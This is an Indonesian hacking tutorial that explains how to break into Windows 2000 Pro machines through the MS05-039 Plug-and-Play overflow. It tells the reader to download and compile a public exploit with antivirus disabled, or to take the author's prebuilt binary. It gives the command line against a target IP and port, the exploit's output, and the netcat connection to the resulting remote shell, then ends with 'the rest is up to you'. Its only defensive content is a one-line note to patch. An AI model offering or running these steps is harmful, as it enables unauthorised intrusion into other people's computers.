Pada sekitar bulan Agustus
2005, Microsoft mengumumkan adanya hole / cacat pada
sistem operasinya yang menimpa Windows 2000 Pro. Dimana hole/Vuln ini dianggap
sebagai "High Risk". Lihat pada situs microsoft.com :
(MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
Dan celah ini juga yang
digunakan oleh virus Zotob dan variant nya yang sempat
heboh pada saat itu. Maka pihak microsoft pun segera menghimbau agar Productnya
terutama Windows 2000 Pro untuk segera melakukan Update/Patch pada OS nya.
Celah ini tidak menutup
kemungkinan terjadi pada Product OS Microsoft yang lain.
Seperti pada Windows XP, 2003, atau Windows 2000 Server. Tapi dari pengalaman
/me, Celah paling besar terjadi pada Windows 2000 Pro walaupun sudah SP4
(Service Pack 4).
BAck to the topic
-----------------
Disini /me akan mengajarkan
bagaimana caranya meng-hack / masuk ke PC lain yang
ber-OS windows 2000 pro tersebut.
Tentunya juka akan menyerang
kita harus mempunya senjata terlebih dahulu. Untuk
siapkan yterlebih dahulu tools yang akan digunakan.
Senjata yang diperlukan
:
1. Exloits ----->>
Download di http://www.milw0rm.com/id.php?id=1149
atau di website ini dengan nama hack2kpro.zip (file .exe)
2. PC dengan OS Windows 2000 atau linux
3. Compiler C utk compile exploit ---->> Untuk OS Windows bisa gunakan
LCC
bisa di download di website ini. Dan di linux tentunya pake gcc
4. PC terkoneksi dengan target
5. Install Progam canggih Netcat (NC) for windows or linux --->> cari
aja di goolge
OK, sekarang kita mulai untuk meng-hack PC Windows 2000 Pro
Ikuti langkah dibawah ini:
1. Download dulu exploitnya
dengan nama file yang diinginkan, misal tools.c
lalu compile dengan compilernya.
Untuk linux dapat menggunakan gcc dengan perintah :
[root@NuXer]# gcc -o <nama exploit> <source file c>
Contoh : gcc -o toolsgua tools.c
Untuk OS Windows dengan
menggunakan LCC tinggal open file tools.c tadi
lalu pilih menu compile. (Jangan lupa matikan dulu antivirus anda)
Jika anda bingung tinggal download saja yang sudah saya compile di site ini
dengan nama file hack2kpro.zip yang didalamnya terdapat file nux3r.exe
2. Setelah di dicompile
menjadi file yang dapat dijalankan langsung.
Jalankan file tersebut dengan perintah :
Untuk windows -->> c:\ nuxer.exe <ip target> <port default>
Di linux -->> [root@NuX3r]# ./nuxer <ip target> <port default>
Ket : port default = 7777
Contoh : nuxer.exe 192.168.0.1 7777
di linux : ./nuxer 192.168.0.1 7777
Maka akan muncul
[*] connecting to 192.168.0.22:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 192.168.0.1:7777
Tekan Ctrl + C
Lalu setelah itu jalan
Netcat yang sudah di download
Untuk windows : c:\ nc 192.168.0.1 7777
Untuk Linux : netcat 192.168.0.1 7777
Jika berhasil maka kita
akan segera mendapatkan root shell Windows 2000 tsb.
Microsoft Windows 2000
[Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Selanjutnya terserah anda...
-------------------------------------------------------------------------------
Pencegahan
-------------------------------------------------------------------------------
Cara mencegah hole / Vuln ini segera update Windows anda dengan update terbaru.
(MS05-039)
Greatz to : houseofdabus
to exploit and milw0rm.com to distributed them, all echo staff
and My Box Mandriva 2006
::|| NuX3r ||::
|